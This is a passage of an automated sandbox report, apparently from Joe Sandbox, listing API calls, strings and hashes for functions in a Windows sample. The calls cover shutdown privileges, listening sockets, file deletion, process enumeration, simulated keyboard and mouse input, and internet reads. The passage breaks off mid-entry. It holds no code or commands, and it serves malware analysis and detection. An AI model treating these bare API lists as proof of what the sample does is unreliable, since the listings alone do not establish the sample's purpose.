                                                            • Part of subcall function 001816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0018173A
                                                            • Part of subcall function 001816C3: GetLastError.KERNEL32 ref: 0018174A
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0018E932
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $ $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-3163812486
                                                          • Opcode ID: 9cfcfae88890e16b5c0988c4aa3182920207038e838504b68f5d6f34fa29e0f0
                                                          • Instruction ID: f99c724e26c53a38b51f526eec161d91121b8b5768a175927c59ac430f169c67
                                                          • Opcode Fuzzy Hash: 9cfcfae88890e16b5c0988c4aa3182920207038e838504b68f5d6f34fa29e0f0
                                                          • Instruction Fuzzy Hash: 8E01D673E10211ABEB6436B49C86FBF729CA714758F154521F812E21E2D7E09E808FE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006), ref: 001A1276
                                                          • WSAGetLastError.WSOCK32 ref: 001A1283
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 001A12BA
                                                          • WSAGetLastError.WSOCK32 ref: 001A12C5
                                                          • closesocket.WSOCK32(00000000), ref: 001A12F4
                                                          • listen.WSOCK32(00000000,00000005), ref: 001A1303
                                                          • WSAGetLastError.WSOCK32 ref: 001A130D
                                                          • closesocket.WSOCK32(00000000), ref: 001A133C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                          • String ID:
                                                          • API String ID: 540024437-0
                                                          • Opcode ID: ab1cfcc2c343dc4e14a9a4601df8a35609227dee8f0e09134949ec193d3de320
                                                          • Instruction ID: 6659c66db9e4f4d066d2f8c2d8a2adf450ce006f5f28a488c14acbdc681911fd
                                                          • Opcode Fuzzy Hash: ab1cfcc2c343dc4e14a9a4601df8a35609227dee8f0e09134949ec193d3de320
                                                          • Instruction Fuzzy Hash: 4B419535600110AFD710DF64D584B69BBE6BF86328F288199E8569F3D2C771ED81CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00123AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00123A97,?,?,00122E7F,?,?,?,00000000), ref: 00123AC2
                                                            • Part of subcall function 0018E199: GetFileAttributesW.KERNEL32(?,0018CF95), ref: 0018E19A
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0018D420
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0018D470
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0018D481
                                                          • FindClose.KERNEL32(00000000), ref: 0018D498
                                                          • FindClose.KERNEL32(00000000), ref: 0018D4A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: 7acf0a2700268d4196971ebdca11149c006353592599e7d65a93a43fbc05e49b
                                                          • Instruction ID: 746af29eacf8953fb7ff7323f0d41ebe82f9ffa3f649dd8e6ef57548df21c912
                                                          • Opcode Fuzzy Hash: 7acf0a2700268d4196971ebdca11149c006353592599e7d65a93a43fbc05e49b
                                                          • Instruction Fuzzy Hash: 38314B710083559FC704FF64E8918AFB7A8BFA5314F844A2DF4D592191EB30AA19CBA3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          • Opcode ID: 4fb429846015856b474e1e23e4e97abae43d93bc7a465b73248894d0bdace243
                                                          • Instruction ID: 746f160832940876d9737a91c4402f7aec83508a3dc949c787fa725234e74470
                                                          • Opcode Fuzzy Hash: 4fb429846015856b474e1e23e4e97abae43d93bc7a465b73248894d0bdace243
                                                          • Instruction Fuzzy Hash: CEC23D71E04628CFDB29CE28DD407EAB7B5EB48306F1541EAD85DEB241E774AE858F40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _wcslen.LIBCMT ref: 001964DC
                                                          • CoInitialize.OLE32(00000000), ref: 00196639
                                                          • CoCreateInstance.OLE32(001BFCF8,00000000,00000001,001BFB68,?), ref: 00196650
                                                          • CoUninitialize.OLE32 ref: 001968D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                          • String ID: .lnk
                                                          • API String ID: 886957087-24824748
                                                          • Opcode ID: 5918aa25a7faecbc52a3e36c65c7b73bd38ff12164d2a360e22f5d130e10dfda
                                                          • Instruction ID: 881b31be3d3c64fb674df975eb8752586d48392fe3691d27b1c75d9ca6fd8371
                                                          • Opcode Fuzzy Hash: 5918aa25a7faecbc52a3e36c65c7b73bd38ff12164d2a360e22f5d130e10dfda
                                                          • Instruction Fuzzy Hash: ACD14871508211AFD704EF24D89196BB7E8FFA8744F00496DF5958B2A1EB70ED09CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 001A22E8
                                                            • Part of subcall function 0019E4EC: GetWindowRect.USER32(?,?), ref: 0019E504
                                                          • GetDesktopWindow.USER32 ref: 001A2312
                                                          • GetWindowRect.USER32(00000000), ref: 001A2319
                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001A2355
                                                          • GetCursorPos.USER32(?), ref: 001A2381
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001A23DF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                          • String ID:
                                                          • API String ID: 2387181109-0
                                                          • Opcode ID: c4cac67e86a036cee5027d8aa5136ba40ac4f90d80ecca8d88b00acc0e29bff3
                                                          • Instruction ID: a25e4efa840e9ba5fd923f864f2e01485308aa15243dd998f9b4cb756a988b15
                                                          • Opcode Fuzzy Hash: c4cac67e86a036cee5027d8aa5136ba40ac4f90d80ecca8d88b00acc0e29bff3
                                                          • Instruction Fuzzy Hash: 4831AD72504315AFDB20DF58C849A9BBBE9FF8A314F000A19F98597191DB74EA48CBD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00199B78
                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00199C8B
                                                            • Part of subcall function 00193874: GetInputState.USER32 ref: 001938CB
                                                            • Part of subcall function 00193874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00193966
                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00199BA8
                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00199C75
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                          • String ID: *.*
                                                          • API String ID: 1972594611-438819550
                                                          • Opcode ID: 65804c56bac0d8e6401abfbeb9340695329c79f2e221856dbd060e95d6f0bcf8
                                                          • Instruction ID: 728025c3157837b87dd225bdadf8ada34333f289b725e956cf9f3deca95575c9
                                                          • Opcode Fuzzy Hash: 65804c56bac0d8e6401abfbeb9340695329c79f2e221856dbd060e95d6f0bcf8
                                                          • Instruction Fuzzy Hash: 0841817190060A9FCF14DF68DC85AEEBBB8FF15310F24415AE815A6191EB30AE94CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00139A4E
                                                          • GetSysColor.USER32(0000000F), ref: 00139B23
                                                          • SetBkColor.GDI32(?,00000000), ref: 00139B36
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Color$LongProcWindow
                                                          • String ID:
                                                          • API String ID: 3131106179-0
                                                          • Opcode ID: 2644b2a663bd2743040f74a7ce548ddb791c734ceefcd788239cd2040ab74c50
                                                          • Instruction ID: 1bd047291e147f060d8233a30ceba1fca7d89e9d9040f44c65d6c5b3f2432429
                                                          • Opcode Fuzzy Hash: 2644b2a663bd2743040f74a7ce548ddb791c734ceefcd788239cd2040ab74c50
                                                          • Instruction Fuzzy Hash: D3A10771208444FFE72DAA3D8C99EBB3AADEB42344F168309F502D7AD5CBA59D41C271
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 001A304E: inet_addr.WSOCK32(?), ref: 001A307A
                                                            • Part of subcall function 001A304E: _wcslen.LIBCMT ref: 001A309B
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 001A185D
                                                          • WSAGetLastError.WSOCK32 ref: 001A1884
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 001A18DB
                                                          • WSAGetLastError.WSOCK32 ref: 001A18E6
                                                          • closesocket.WSOCK32(00000000), ref: 001A1915
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 1601658205-0
                                                          • Opcode ID: 05b416ceb6da20f0ea9b2724b7a7004dc8787fea53bf3609569ed735ae111005
                                                          • Instruction ID: 5866653ccfc8bff3e6cf72c92951e84a5017ae09ec3b061f1a1982f7d2c20cba
                                                          • Opcode Fuzzy Hash: 05b416ceb6da20f0ea9b2724b7a7004dc8787fea53bf3609569ed735ae111005
                                                          • Instruction Fuzzy Hash: 5B51B275A00210AFDB10AF24D886F2A77E5AB59718F04805CF909AF3C3C775AD41CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: c97739ca6ffa4890e50055a39821edafbe454314dabf5f5a0efdfc64fecb62a2
                                                          • Instruction ID: 322be36db647affece77e24d76df70d671c42453dfa536be63272603bee169f8
                                                          • Opcode Fuzzy Hash: c97739ca6ffa4890e50055a39821edafbe454314dabf5f5a0efdfc64fecb62a2
                                                          • Instruction Fuzzy Hash: 3221D6317402116FD7208F2AC864BAA7FA5EF95314F5A8058E845CB351C771DC42CBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                          • API String ID: 0-1546025612
                                                          • Opcode ID: 098769f4e3a1e170cbeb0cf2f5a8510ff78c68187383213d8adaed59c7bf34c1
                                                          • Instruction ID: 3133302ca2aa8fc4b87679c9c95ee65656de482e6c5f969902513cb5acc8344a
                                                          • Opcode Fuzzy Hash: 098769f4e3a1e170cbeb0cf2f5a8510ff78c68187383213d8adaed59c7bf34c1
                                                          • Instruction Fuzzy Hash: F2A29170E0162ACBDF24CF58D8507ADB7B2BF54310F2581AAE815A7385EB749DA1CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 001AA6AC
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 001AA6BA
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 001AA79C
                                                          • CloseHandle.KERNEL32(00000000), ref: 001AA7AB
                                                            • Part of subcall function 0013CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00163303,?), ref: 0013CE8A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                          • String ID:
                                                          • API String ID: 1991900642-0
                                                          • Opcode ID: e5fa9876f432ab9364e19954fc50d02cda536ca9ea3f26105e4668edbef4a00d
                                                          • Instruction ID: 64ece234c2e4b908d85e104337d8fbb199fd360a35b6b750ddba9731d8b14448
                                                          • Opcode Fuzzy Hash: e5fa9876f432ab9364e19954fc50d02cda536ca9ea3f26105e4668edbef4a00d
                                                          • Instruction Fuzzy Hash: 8C516D71508310AFD710EF24D886E6BBBE8FF99754F40492DF58997292EB30D914CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0018AAAC
                                                          • SetKeyboardState.USER32(00000080), ref: 0018AAC8
                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0018AB36
                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0018AB88
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 985bc00b0650f22d69de82ca60fd47743c4c6669bedda878b6e879fdc3d09456
                                                          • Instruction ID: 81d7c3c0e403a78bdb3671c8fdeb1c7bce703139dddf4bd962ea7d695adef840
                                                          • Opcode Fuzzy Hash: 985bc00b0650f22d69de82ca60fd47743c4c6669bedda878b6e879fdc3d09456
                                                          • Instruction Fuzzy Hash: 0831F630A40648AFFB35AA648C05BFA7BA6AF54310F84421BF581565D1D3759B81CFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0015BB7F
                                                            • Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
                                                            • Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0
                                                          • GetTimeZoneInformation.KERNEL32 ref: 0015BB91
                                                          • WideCharToMultiByte.KERNEL32(00000000,?,001F121C,000000FF,?,0000003F,?,?), ref: 0015BC09
                                                          • WideCharToMultiByte.KERNEL32(00000000,?,001F1270,000000FF,?,0000003F,?,?,?,001F121C,000000FF,?,0000003F,?,?), ref: 0015BC36
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                          • String ID:
                                                          • API String ID: 806657224-0
                                                          • Opcode ID: 01c36477b0483185f11ce55d8f16af7c809a5a9550a28e758692e500709981e5
                                                          • Instruction ID: 883c565ececd19fb88e7b89e346f32a4eaf298d057e8c01aad05ca9922444a52
                                                          • Opcode Fuzzy Hash: 01c36477b0483185f11ce55d8f16af7c809a5a9550a28e758692e500709981e5
                                                          • Instruction Fuzzy Hash: E131B071908205EFCB15DFA9DC80879BBB8FF5631172442AAE874EB2B1D7309D84CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0019CE89
                                                          • GetLastError.KERNEL32(?,00000000), ref: 0019CEEA
                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 0019CEFE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorEventFileInternetLastRead
                                                          • String ID:
                                                          • API String ID: 234945975-0
                                                          • Opcode ID: 2035bdd71a8516253b7e4ac9ca3ef1438682701f452afa232fa0f7e97f9d5ba3
                                                          • Instruction ID: e779623dca7de3d97eebdab8b009b3c9d5d182454de9e8144f6f2a4625b4b67f
                                                          • Opcode Fuzzy Hash: 2035bdd71a8516253b7e4ac9ca3ef1438682701f452afa232fa0f7e97f9d5ba3
                                                          • Instruction Fuzzy Hash: 2321AF715007059BDF30DF65D948BA77BFCEB50354F10442EE586D2551E770EE448BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001882AA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: 0d25f3ff296d37f43d5f112b9a887fc3db645fc6efadf1b617b9a1e9e79a6927
                                                          • Instruction ID: 44a529a391c755a513cc1d31dd708a5a99fb85923bfda1c19085c0ab6601009a
